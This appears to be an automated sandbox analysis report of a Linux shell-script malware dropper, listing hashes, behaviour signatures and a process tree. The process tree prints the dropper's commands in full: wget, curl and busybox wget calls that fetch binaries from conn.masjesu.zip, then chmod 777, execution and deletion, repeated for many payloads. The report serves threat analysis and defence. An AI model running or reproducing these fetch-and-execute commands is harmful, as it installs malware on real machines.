Analysis
-
max time kernel
105s -
max time network
106s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:24
Static task
static1
Behavioral task
behavioral1
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
-
Size
10KB
-
MD5
39af5a8e20eb9037c16b16bbdb233387
-
SHA1
fa93ebed804f88f9810f418aa96d520d93249855
-
SHA256
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58
-
SHA512
82d0395702b8b6084c5c890074c5fe8cce1bb3fd3a61b94b1fb466c306072308348c69dd1745e1a944949d06cf55cf2f18862833d212ece5910d32d914d7eb4b
-
SSDEEP
192:QQqIcwDH+mKFlIZx/QVgh3Xql5cjG5Q3Xql54C0cwDH+mEFlIZx/F:QQq5VgNjG5CCY
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 889 chmod 854 chmod 861 chmod 903 chmod 994 chmod 1008 chmod 836 chmod 896 chmod 931 chmod 952 chmod 959 chmod 973 chmod 980 chmod 875 chmod 966 chmod 917 chmod 938 chmod 847 chmod 806 chmod 868 chmod 882 chmod 945 chmod 987 chmod 793 chmod 924 chmod 1001 chmod 741 chmod 910 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc 742 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO 794 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 807 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I 837 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u 848 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw 855 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm 862 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR 869 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA 876 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N 883 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh 890 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY 897 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD 904 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 911 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm 918 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR 925 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA 932 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N 939 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh 946 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY 953 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD 960 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 967 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc 974 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO 981 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 988 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I 995 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u 1002 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw 1009 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 888 busybox 906 wget 941 wget 991 curl 799 busybox 850 wget 928 curl 937 busybox 969 wget 976 wget 797 curl 892 wget 911 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 977 curl 1004 wget 1005 curl 993 busybox 831 busybox 841 wget 858 curl 916 busybox 935 curl 962 wget 968 rm 970 curl 796 wget 812 wget 846 busybox 857 wget 879 curl 900 curl 967 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 997 wget 867 busybox 902 busybox 913 wget 948 wget 990 wget 717 wget 739 busybox 788 curl 851 curl 885 wget 819 curl 920 wget 963 curl 878 wget 930 busybox 944 busybox 951 busybox 972 busybox 881 busybox 907 curl 914 curl 921 curl 923 busybox 955 wget 965 busybox 864 wget 874 busybox 899 wget 927 wget 949 curl 998 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY curl File opened for modification /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD curl File opened for modification /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm curl File opened for modification /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY curl File opened for modification /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u curl File opened for modification /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u curl File opened for modification /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh curl File opened for modification /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 curl File opened for modification /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD curl File opened for modification /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc curl File opened for modification /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO curl File opened for modification /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm curl File opened for modification /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 curl File opened for modification /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO curl File opened for modification /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I curl File opened for modification /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw curl File opened for modification /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N curl File opened for modification /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh curl File opened for modification /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA curl File opened for modification /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR curl File opened for modification /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA curl File opened for modification /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 curl File opened for modification /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 curl File opened for modification /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I curl File opened for modification /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw curl File opened for modification /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc curl File opened for modification /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR curl File opened for modification /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N curl
Processes
-
/tmp/70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh/tmp/70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc./ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:792
-
-
/bin/chmodchmod 777 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO./yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- System Network Configuration Discovery
PID:796
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- System Network Configuration Discovery
PID:799
-
-
/bin/chmodchmod 777 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05./AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- System Network Configuration Discovery
PID:831
-
-
/bin/chmodchmod 777 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I./ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:846
-
-
/bin/chmodchmod 777 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u./LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- System Network Configuration Discovery
PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:853
-
-
/bin/chmodchmod 777 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw./9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:856
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:857
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:860
-
-
/bin/chmodchmod 777 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm./Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:863
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- System Network Configuration Discovery
PID:864
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- System Network Configuration Discovery
PID:867
-
-
/bin/chmodchmod 777 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR./q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA./3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- System Network Configuration Discovery
PID:881
-
-
/bin/chmodchmod 777 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N./4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh./97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:895
-
-
/bin/chmodchmod 777 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY./4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD./OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵PID:909
-
-
/bin/chmodchmod 777 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3./nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:911
-
-
/bin/rmrm nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm./Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:919
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- System Network Configuration Discovery
PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/chmodchmod 777 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR./q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA./3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N./4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:940
-
-
